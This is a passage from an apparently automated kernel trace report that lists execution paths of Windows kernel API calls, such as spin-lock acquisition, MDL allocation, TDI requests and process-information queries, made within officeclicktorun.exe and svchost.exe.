| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f1250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #32 (length: 17, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 17 |
Processes
»
| Process | Count |
|---|---|
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #86 (length: 93, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 93 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c634710 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd000339f4570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd000339f4528, Handle_out = 0xffffffff80000cac, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cac, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd000339f4520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cac, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd000339f4520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000cac, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ff9 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003c63488c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c306640 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd000339f4370, ret_val_unk_out = 0xffffe0003b7c9cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c306640, MemoryDescriptorList_unk_out = 0xffffe0003c306640 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003b7c9cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b7c9cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c306640 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7b6010 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd000339f4570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd000339f4528, Handle_out = 0xffffffff80000d68, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000d68, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd000339f4520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000d68, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd000339f4520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000d68, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ff8 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a7b618c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c306640 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd000339f4370, ret_val_unk_out = 0xffffe0003b7c9cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c306640, MemoryDescriptorList_unk_out = 0xffffe0003c306640 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003b7c9cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b7c9cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c306640 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #185 (length: 223, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 223 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b182010, Irp_unk_out = 0xffffe0003b182010, ret_val_out = 0x103 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002c852570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002c852528, Handle_out = 0xffffffff80000cbc, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cbc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cbc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000cbc, ret_val_out = 0x0 |
